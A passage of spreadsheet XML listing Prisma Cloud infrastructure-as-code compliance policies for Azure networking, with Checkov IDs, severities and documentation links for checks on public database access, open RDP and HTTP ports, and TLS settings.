          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1377" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1377" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1377" t="inlineStr"/>
      <c r="R1377" t="inlineStr"/>
      <c r="S1377" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="T1377" t="b">
        <v>0</v>
      </c>
      <c r="U1377" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1377" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-mariadb-firewall-rule,azure-sql-firewall-rule,azure-postgresql-firewall-rule,azure-mysql-firewall-rule</t>
        </is>
      </c>
      <c r="W1377" t="inlineStr">
        <is>
          <t>Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP)</t>
        </is>
      </c>
      <c r="X1377" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-4</t>
        </is>
      </c>
      <c r="Y1377" t="inlineStr"/>
      <c r="Z1377" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_mariadb_firewall_rule","azurerm_sql_firewall_rule","azurerm_postgresql_firewall_rule","azurerm_mysql_firewall_rule"]}</t>
        </is>
      </c>
      <c r="AA1377" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1377" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1377" t="inlineStr">
        <is>
          <t>CKV_AZURE_11</t>
        </is>
      </c>
      <c r="AD1377" t="b">
        <v>1</v>
      </c>
      <c r="AE1377" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1377" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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7" t="inlineStr">
        <is>
          <t>427c5e57-07d6-4dc6-8142-848a2472e963</t>
        </is>
      </c>
      <c r="AI1377" t="inlineStr"/>
      <c r="AJ1377" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1377" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1378">
      <c r="A1378" t="inlineStr"/>
      <c r="B1378" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1378" s="2" t="inlineStr"/>
      <c r="D1378" t="inlineStr"/>
      <c r="E1378" t="inlineStr"/>
      <c r="F1378" t="inlineStr"/>
      <c r="G1378" t="b">
        <v>1</v>
      </c>
      <c r="H13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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1378" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-mssql</t>
        </is>
      </c>
      <c r="K1378" t="inlineStr">
        <is>
          <t>SQL Server is enabled for public network access</t>
        </is>
      </c>
      <c r="L1378" t="inlineStr"/>
      <c r="M1378" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1378" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1378" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1378" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1378" t="inlineStr"/>
      <c r="R1378" t="inlineStr"/>
      <c r="S1378" t="inlineStr"/>
      <c r="T1378" t="b">
        <v>0</v>
      </c>
      <c r="U1378" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1378" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-mssql-server</t>
        </is>
      </c>
      <c r="W1378" t="inlineStr">
        <is>
          <t>Ensure that SQL server disables public network access</t>
        </is>
      </c>
      <c r="X1378" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-that-sql-server-disables-public-network-access</t>
        </is>
      </c>
      <c r="Y1378" t="inlineStr"/>
      <c r="Z1378" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_mssql_server"]}</t>
        </is>
      </c>
      <c r="AA1378" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1378" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1378" t="inlineStr">
        <is>
          <t>CKV_AZURE_113</t>
        </is>
      </c>
      <c r="AD1378" t="b">
        <v>1</v>
      </c>
      <c r="AE1378" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1378" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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8" t="inlineStr">
        <is>
          <t>bfa52af6-2560-48c3-bec8-966da86abb88</t>
        </is>
      </c>
      <c r="AI1378" t="inlineStr"/>
      <c r="AJ1378" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1378" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1379">
      <c r="A1379" t="inlineStr"/>
      <c r="B1379" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1379" s="2" t="inlineStr"/>
      <c r="D1379" t="inlineStr"/>
      <c r="E1379" t="inlineStr"/>
      <c r="F1379" t="inlineStr"/>
      <c r="G1379" t="b">
        <v>1</v>
      </c>
      <c r="H13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79" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1379" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-mysql</t>
        </is>
      </c>
      <c r="K1379" t="inlineStr">
        <is>
          <t>'public network access enabled' is not set to 'False' for mySQL servers</t>
        </is>
      </c>
      <c r="L1379" t="inlineStr"/>
      <c r="M1379" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1379" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1379" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1379" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1379" t="inlineStr"/>
      <c r="R1379" t="inlineStr"/>
      <c r="S1379" t="inlineStr"/>
      <c r="T1379" t="b">
        <v>0</v>
      </c>
      <c r="U1379" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1379" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-mysql-server</t>
        </is>
      </c>
      <c r="W1379" t="inlineStr">
        <is>
          <t>Ensure 'public network access enabled' is set to 'False' for mySQL servers</t>
        </is>
      </c>
      <c r="X1379" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-public-network-access-enabled-is-set-to-false-for-mysql-servers</t>
        </is>
      </c>
      <c r="Y1379" t="inlineStr"/>
      <c r="Z1379" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_mysql_server"]}</t>
        </is>
      </c>
      <c r="AA1379" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1379" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1379" t="inlineStr">
        <is>
          <t>CKV_AZURE_53</t>
        </is>
      </c>
      <c r="AD1379" t="b">
        <v>1</v>
      </c>
      <c r="AE1379" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1379" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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79" t="inlineStr">
        <is>
          <t>0224a383-4c7c-4dca-b52c-f6fab8014666</t>
        </is>
      </c>
      <c r="AI1379" t="inlineStr"/>
      <c r="AJ1379" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1379" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1380">
      <c r="A1380" t="inlineStr"/>
      <c r="B1380" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1380" s="2" t="inlineStr"/>
      <c r="D1380" t="inlineStr"/>
      <c r="E1380" t="inlineStr"/>
      <c r="F1380" t="inlineStr"/>
      <c r="G1380" t="b">
        <v>1</v>
      </c>
      <c r="H13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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1380" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-network</t>
        </is>
      </c>
      <c r="K1380" t="inlineStr">
        <is>
          <t>Network interfaces use public IPs</t>
        </is>
      </c>
      <c r="L1380" t="inlineStr"/>
      <c r="M1380" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1380" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1380" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1380" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1380" t="inlineStr"/>
      <c r="R1380" t="inlineStr"/>
      <c r="S1380" t="inlineStr"/>
      <c r="T1380" t="b">
        <v>0</v>
      </c>
      <c r="U1380" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1380" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-network-interface</t>
        </is>
      </c>
      <c r="W1380" t="inlineStr">
        <is>
          <t>Ensure that Network Interfaces don't use public IPs</t>
        </is>
      </c>
      <c r="X1380" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-that-network-interfaces-dont-use-public-ips</t>
        </is>
      </c>
      <c r="Y1380" t="inlineStr"/>
      <c r="Z1380" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_network_interface"]}</t>
        </is>
      </c>
      <c r="AA1380" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1380" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1380" t="inlineStr">
        <is>
          <t>CKV_AZURE_119</t>
        </is>
      </c>
      <c r="AD1380" t="b">
        <v>1</v>
      </c>
      <c r="AE1380" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1380" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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0" t="inlineStr">
        <is>
          <t>b811692c-9a16-421f-b8f0-847064165f5f</t>
        </is>
      </c>
      <c r="AI1380" t="inlineStr"/>
      <c r="AJ1380" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1380" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1381">
      <c r="A1381" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B1381" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1381" s="2" t="inlineStr"/>
      <c r="D1381" t="inlineStr"/>
      <c r="E1381" t="inlineStr"/>
      <c r="F1381" t="inlineStr"/>
      <c r="G1381" t="b">
        <v>1</v>
      </c>
      <c r="H13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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1381" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-network</t>
        </is>
      </c>
      <c r="K1381" t="inlineStr">
        <is>
          <t>Azure RDP Internet access is not restricted</t>
        </is>
      </c>
      <c r="L1381" t="inlineStr"/>
      <c r="M1381" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1381" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1381" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1381" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1381" t="inlineStr">
        <is>
          <t>5.1 Config</t>
        </is>
      </c>
      <c r="R1381" t="inlineStr">
        <is>
          <t>5.1.1 Config - Other</t>
        </is>
      </c>
      <c r="S1381" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="T1381" t="b">
        <v>0</v>
      </c>
      <c r="U1381" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1381" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-network-security-group,azure-network-security-rule</t>
        </is>
      </c>
      <c r="W1381" t="inlineStr">
        <is>
          <t>Ensure that RDP access is restricted from the internet</t>
        </is>
      </c>
      <c r="X1381" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-2</t>
        </is>
      </c>
      <c r="Y1381" t="inlineStr"/>
      <c r="Z1381" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_network_security_group","azurerm_network_security_rule"]}</t>
        </is>
      </c>
      <c r="AA1381" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1381" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1381" t="inlineStr">
        <is>
          <t>CKV_AZURE_9</t>
        </is>
      </c>
      <c r="AD1381" t="b">
        <v>1</v>
      </c>
      <c r="AE1381" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1381" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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1" t="inlineStr">
        <is>
          <t>c5b550a1-6a53-4033-a0a3-95fe4e45349e</t>
        </is>
      </c>
      <c r="AI1381" t="inlineStr"/>
      <c r="AJ1381" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1381" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1382">
      <c r="A1382" t="inlineStr"/>
      <c r="B1382" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1382" s="2" t="inlineStr"/>
      <c r="D1382" t="inlineStr"/>
      <c r="E1382" t="inlineStr"/>
      <c r="F1382" t="inlineStr"/>
      <c r="G1382" t="b">
        <v>1</v>
      </c>
      <c r="H13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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1382" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-network</t>
        </is>
      </c>
      <c r="K1382" t="inlineStr">
        <is>
          <t>Azure HTTP (port 80) access from the internet is not restricted</t>
        </is>
      </c>
      <c r="L1382" t="inlineStr"/>
      <c r="M1382" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1382" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1382" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1382" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1382" t="inlineStr"/>
      <c r="R1382" t="inlineStr"/>
      <c r="S1382" t="inlineStr"/>
      <c r="T1382" t="b">
        <v>0</v>
      </c>
      <c r="U1382" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1382" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-network-security-group,azure-network-security-rule</t>
        </is>
      </c>
      <c r="W1382" t="inlineStr">
        <is>
          <t>Ensure that HTTP (port 80) access is restricted from the internet</t>
        </is>
      </c>
      <c r="X1382" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-azure-http-port-80-access-from-the-internet-is-restricted</t>
        </is>
      </c>
      <c r="Y1382" t="inlineStr"/>
      <c r="Z1382" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_network_security_group", "azurerm_network_security_rule"]}</t>
        </is>
      </c>
      <c r="AA1382" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1382" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1382" t="inlineStr">
        <is>
          <t>CKV_AZURE_160</t>
        </is>
      </c>
      <c r="AD1382" t="b">
        <v>1</v>
      </c>
      <c r="AE1382" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1382" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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2" t="inlineStr">
        <is>
          <t>85be5381-9513-450c-8b26-f5f5f638af46</t>
        </is>
      </c>
      <c r="AI1382" t="inlineStr"/>
      <c r="AJ1382" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1382" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1383">
      <c r="A1383" t="inlineStr"/>
      <c r="B1383" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1383" s="2" t="inlineStr"/>
      <c r="D1383" t="inlineStr"/>
      <c r="E1383" t="inlineStr"/>
      <c r="F1383" t="inlineStr"/>
      <c r="G1383" t="b">
        <v>1</v>
      </c>
      <c r="H13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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1383" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-postgresql</t>
        </is>
      </c>
      <c r="K1383" t="inlineStr">
        <is>
          <t>Azure PostgreSQL does not use the latest version of TLS encryption</t>
        </is>
      </c>
      <c r="L1383" t="inlineStr"/>
      <c r="M1383" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1383" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1383" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1383" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1383" t="inlineStr"/>
      <c r="R1383" t="inlineStr"/>
      <c r="S1383" t="inlineStr"/>
      <c r="T1383" t="b">
        <v>0</v>
      </c>
      <c r="U1383" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1383" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-postgresql-server</t>
        </is>
      </c>
      <c r="W1383" t="inlineStr">
        <is>
          <t>Ensure PostgreSQL is using the latest version of TLS encryption</t>
        </is>
      </c>
      <c r="X1383" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-azure-postgresql-uses-the-latest-version-of-tls-encryption</t>
        </is>
      </c>
      <c r="Y1383" t="inlineStr"/>
      <c r="Z1383" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_postgresql_server"]}</t>
        </is>
      </c>
      <c r="AA1383" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1383" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1383" t="inlineStr">
        <is>
          <t>CKV_AZURE_147</t>
        </is>
      </c>
      <c r="AD1383" t="b">
        <v>1</v>
      </c>
      <c r="AE1383" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1383" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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3" t="inlineStr">
        <is>
          <t>60cb4ec2-7c4b-446d-a8a8-715172aa0974</t>
        </is>
      </c>
      <c r="AI1383" t="inlineStr"/>
      <c r="AJ1383" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1383" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1384">
      <c r="A1384" t="inlineStr"/>
      <c r="B1384" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1384" s="2" t="inlineStr"/>
      <c r="D1384" t="inlineStr"/>
      <c r="E1384" t="inlineStr"/>
      <c r="F1384" t="inlineStr"/>
      <c r="G1384" t="b">
        <v>1</v>
      </c>
      <c r="H13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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1384" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-postgresql</t>
        </is>
      </c>
      <c r="K1384" t="inlineStr">
        <is>
          <t>PostgreSQL server does not disable public network access</t>
        </is>
      </c>
      <c r="L1384" t="inlineStr"/>
      <c r="M1384" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1384" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1384" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1384" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1384" t="inlineStr"/>
      <c r="R1384" t="inlineStr"/>
      <c r="S1384" t="inlineStr"/>
      <c r="T1384" t="b">
        <v>0</v>
      </c>
      <c r="U1384" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1384" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-postgresql-server</t>
        </is>
      </c>
      <c r="W1384" t="inlineStr">
        <is>
          <t>Ensure that PostgreSQL server disables public network access</t>
        </is>
      </c>
      <c r="X1384" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-that-postgresql-server-disables-public-network-access</t>
        </is>
      </c>
      <c r="Y1384" t="inlineStr"/>
      <c r="Z1384" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_postgresql_server"]}</t>
        </is>
      </c>
      <c r="AA1384" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1384" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1384" t="inlineStr">
        <is>
          <t>CKV_AZURE_68</t>
        </is>
      </c>
      <c r="AD1384" t="b">
        <v>1</v>
      </c>
      <c r="AE1384" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1384" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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4" t="inlineStr">
        <is>
          <t>a07a21c2-bea9-4e5e-8903-aba5c9e6bf02</t>
        </is>
      </c>
      <c r="AI1384" t="inlineStr"/>
      <c r="AJ1384" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1384" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1385">
      <c r="A1385" t="inlineStr"/>
      <c r="B1385" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1385" s="2" t="inlineStr"/>
      <c r="D1385" t="inlineStr"/>
      <c r="E1385" t="inlineStr"/>
      <c r="F1385" t="inlineStr"/>
      <c r="G1385" t="b">
        <v>1</v>
      </c>
      <c r="H13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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1385" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-redis</t>
        </is>
      </c>
      <c r="K1385" t="inlineStr">
        <is>
          <t>Not only SSL are enabled for cache for Redis</t>
        </is>
      </c>
      <c r="L1385" t="inlineStr"/>
      <c r="M1385" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1385" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1385" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1385" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1385" t="inlineStr"/>
      <c r="R1385" t="inlineStr"/>
      <c r="S1385" t="inlineStr"/>
      <c r="T1385" t="b">
        <v>0</v>
      </c>
      <c r="U1385" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1385" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-redis-cache</t>
        </is>
      </c>
      <c r="W1385" t="inlineStr">
        <is>
          <t>Ensure that only SSL are enabled for Cache for Redis</t>
        </is>
      </c>
      <c r="X1385" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-that-only-ssl-are-enabled-for-cache-for-redis</t>
        </is>
      </c>
      <c r="Y1385" t="inlineStr"/>
      <c r="Z1385" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_redis_cache"]}</t>
        </is>
      </c>
      <c r="AA1385" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1385" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1385" t="inlineStr">
        <is>
          <t>CKV_AZURE_91</t>
        </is>
      </c>
      <c r="AD1385" t="b">
        <v>1</v>
      </c>
      <c r="AE1385" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1385" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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5" t="inlineStr">
        <is>
          <t>ae1e5122-48d7-47c4-8493-ce3e97a0f488</t>
        </is>
      </c>
      <c r="AI1385" t="inlineStr"/>
      <c r="AJ1385" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1385" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1386">
      <c r="A1386" t="inlineStr"/>
      <c r="B1386" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1386" s="2" t="inlineStr"/>
      <c r="D1386" t="inlineStr"/>
      <c r="E1386" t="inlineStr"/>
      <c r="F1386" t="inlineStr"/>
      <c r="G1386" t="b">
        <v>1</v>
      </c>
      <c r="H13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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1386" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-redis</t>
        </is>
      </c>
      <c r="K1386" t="inlineStr">
        <is>
          <t>Azure cache for Redis has public network access enabled</t>
        </is>
      </c>
      <c r="L1386" t="inlineStr"/>
      <c r="M1386" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1386" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1386" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1386" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1386" t="inlineStr"/>
      <c r="R1386" t="inlineStr"/>
      <c r="S1386" t="inlineStr"/>
      <c r="T1386" t="b">
        <v>0</v>
      </c>
      <c r="U1386" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1386" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-redis-cache</t>
        </is>
      </c>
      <c r="W1386" t="inlineStr">
        <is>
          <t>Ensure that Azure Cache for Redis disables public network access</t>
        </is>
      </c>
      <c r="X1386" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-cache-for-redis-disables-public-network-access</t>
        </is>
      </c>
      <c r="Y1386" t="inlineStr"/>
      <c r="Z1386" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_redis_cache"]}</t>
        </is>
      </c>
      <c r="AA1386" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1386" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1386" t="inlineStr">
        <is>
          <t>CKV_AZURE_89</t>
        </is>
      </c>
      <c r="AD1386" t="b">
        <v>1</v>
      </c>
      <c r="AE1386" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1386" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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6" t="inlineStr">
        <is>
          <t>446da765-1694-4f82-a6fe-3e657b5ac3d2</t>
        </is>
      </c>
      <c r="AI1386" t="inlineStr"/>
      <c r="AJ1386" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1386" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1387">
      <c r="A1387" t="inlineStr"/>
      <c r="B1387" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1387" s="2" t="inlineStr"/>
      <c r="D1387" t="inlineStr"/>
      <c r="E1387" t="inlineStr"/>
      <c r="F1387" t="inlineStr"/>
      <c r="G1387" t="b">
        <v>1</v>
      </c>
      <c r="H13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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1387" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-redis</t>
        </is>
      </c>
      <c r="K1387" t="inlineStr">
        <is>
